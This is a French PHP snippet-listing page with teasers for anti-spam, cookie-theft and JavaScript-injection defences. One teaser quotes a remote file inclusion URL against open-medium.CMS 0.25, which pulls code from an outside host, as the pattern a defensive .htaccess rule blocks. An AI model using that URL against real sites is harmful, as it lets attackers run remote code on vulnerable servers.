Astuce trés simple contre le spam - PHP Sources
Compatibilité : PHP 5, PHP 7, PHP 8
On sait que les robots pollue le web avec le spam en alimentant de manière automatique les formulaires de contacts par exemple.
Le script se trouve peut-être sur votre site géré par open-medium.CMS en version 0.25.
La faille touche les sites dont le paramètre register_globals est à on.
Une petite règle dans le fichier .htaccess permet de renvoyer un code retour 403. Les url concernées sont de la forme : http://www.example.com/404.php?REDSYS[MYPATH][TEMPLATES]=http://sitepourri.com/page.txt?
|
On sait que les robots pollue le web avec le spam en alimentant de manière automatique les formulaires de contacts par exemple.
Le but de cette classe est de protéger vos utilisateurs du vol de cookie online, en introduisant leur IP publique dans le hash du cookie.
Vous en marre de voir vos formulaires rempli de Javascript - Ce code va empêcher plusieurs formes de hack JS.
Il faut installer un script zippé au préalable puis remplacer la fonction controle_ip() par celle que nous vous donnons.
Tag Cloud Mysqli - Actualisé pour passer sur tous les sites web. Démo en ligne disponible. Explication du code. Support.